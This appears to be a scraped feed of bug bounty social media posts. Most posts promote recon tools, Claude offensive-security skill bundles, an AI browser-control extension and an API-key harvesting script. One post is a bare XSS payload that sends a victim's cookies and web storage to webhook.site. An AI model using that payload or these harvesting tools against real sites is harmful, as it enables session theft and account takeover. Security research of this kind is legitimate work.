Valid Burpsuite alternative github.com/skuntir/proxer

🤖 PentesterFlow Agent is an open-source AI-powered offensive security assistant that runs directly in your terminal. It can execute commands, analyze responses, process traffic, help verify findings, and assist with reporting all while keeping humans in control. An interesting project for pentesters, bug bounty hunters, and security researchers exploring agentic AI workflows. 🔗 github.com/PentesterFlow/age… #CyberSecurity #BugBounty #Pentesting #AI #InfoSec #OpenSource

Auth bugs pay the most in bug bounty. Most hunters never touch them, because they never actually understood how auth works. In this video, I break down web auth the way the developer who built it sees it. Sessions, JWTs, OAuth 2.0, the Authorisation Code Flow, PKCE, and OpenID Connect. Why each protection exists, what it defends, and the exact bug that shows up when it's missing. Auth For Hackers youtu.be/csKveMxn8rA #BugBounty #WebSecurity #EthicalHacking #AmrSec #OAuth #JWT #OIDC

Built 2 free browser-based recon tools for bug bounty 🛠️ No install, no API keys, nothing logged. 🔍 Subdomain enum → recon.rootxvishal.com 🕸️ Passive URL crawler → crawler.rootxvishal.com Open a tab, type a domain, go. Authorized recon only free sources, so a source may rate-limit/block occasionally. #BugBounty #Recon #OffensiveSecurity #InfoSec #CyberSecurity #OSINT #PenetrationTesting #AppSec #bugbountytips

Always open to hunt together. Dm for collab. #bugbounty

/login?redirectUrl=javascript:fetch('webhook.site 0{method:'POST', body:JSON.stringify({cookies:document.cookie,sessionStorage:sessionStorage,localStorage:localStorage})})

⚔️ Claude-Red = Offensive Security Skills for Claude AI A massive open-source framework that transforms Claude into a context-aware red team assistant. 🔥 📚 100 offensive security skill modules 🌐 Web exploitation 🧠 Active Directory attacks ☁️ Cloud attack paths 📡 Wireless exploitation 💥 Exploit dev & fuzzing 🤖 AI security testing Built for: 🎯 Bug bounty hunters 🛡️ Red teamers 🔬 Security researchers 🎓 CTF players ☁️ Cloud pentesters Capabilities include: ✅ SQLi / XSS / SSRF / RCE ✅ ADCS / Kerberos / ACL abuse ✅ EDR bypass & shellcode ops ✅ WPA2/WPA3 attacks ✅ OAuth & JWT exploitation ✅ Prompt injection & jailbreak testing 🔗 github.com/SnailSploit/Claud… #RedTeaming #Hacking #CyberThreat #ThreatIntel #Pentest #OpenSource

Claude Code Skill Bundle for Bug Bounty Hunting & External Red Team Operations 🤖💀 • 51 offensive security skills 15 slash commands • Trained on 574 disclosed HackerOne-style report patterns • Covers XSS, SSRF, SQLi, OAuth, JWT, GraphQL, RCE, IDOR & API abuse • Enterprise attack chains for M365, Okta, VPNs, SharePoint & vCenter • Built-in recon, exploit chaining, triage, evidence hygiene & reporting github.com/elementalsouls/Cl… #BugBounty #RedTeam #CyberSecurity #Pentesting #AppSec

The worst platform i have ever seen

Android Pentesting Skill github.com/DragonJAR/Android…

1600 regex patterns for detecting secrets, API keys, tokens, and passwords. 💀🔥 This open-source database can directly improve your secret scanning pipelines (TruffleHog, Gitleaks, etc.). If you're doing AppSec seriously, this is worth integrating. github.com/mazen160/secrets-… #AppSec #CyberSecurity #Infosec

What to look for in android app bug hunting. #bugbountytips #bugbounty

I built FoxHound, a Firefox extension that gives any AI agent full control over your browser. I needed this while hunting. There are bugs the egent can not properly exploit without using the browser. Clicking things, reading the DOM, replaying requests, checking cookies across containers, running JS on the page. So i built it. The agent can navigate tabs, click elements, fill and submit forms, upload files, take screenshots, capture all HTTP traffic with full request and response bodies, replay and modify requests, read and write cookies and storage, intercept live requests, hook into postMessage traffic, WebSocket connections, route changes, console output, service workers, and more. It also uses PwnFox containers so the agent knows which container each request came from. If you are doing multi account testing, everything stays separated. Setup takes 2 minutes: 1. Install the extension: addons.mozilla.org/firefox/a… 2. Run: npm install -g foxhound-mcp 3. Copy the config from the extension options page into your MCP client. Done. It is free. Give it a try and if you find any issues or want to add anything, open an issue on the GitHub: github.com/amrelsagaei/foxho…

lots of people asked me for my recon methodology HYG: github.com/nullthrix/BugBoun… soon will publish my full WAP methodology... #BugBounty #hacking #security #hackerone #bugcrowd #integrity #yeswehack

Autonomous bug-bounty framework for Claude Code — 40 specialist agents, exploit-chain builder, writeup search, and live HackerOne/Bugcrowd integration. github.com/H-mmer/pentest-ag…

Just a small approach to automate the things using one file script. #bugbounty

dorkking.blindf.com/bugcrowd… Bugcrowd Vrt simplified. I hope it will help the beginners. #bugbountytips

github.com/suchinsuthar/JSpl…( @shinchina_ )

Celebrating 1 year with the client. Bugcrowd is doing good but client wants to celebrate 1 year relationship with the researcher. :). This is called long term relationship. hehe

Drop subdomains in Get Gemini-enabled API keys out. Automates HTML JS crawling & AI access testing. Bug hunters — this one’s for you 🔥 github.com/dirtycoder0124/ge… Thanks to @trufflesecurity #BugBounty #bugbountytips Automation of trufflesecurity.com/blog/goo…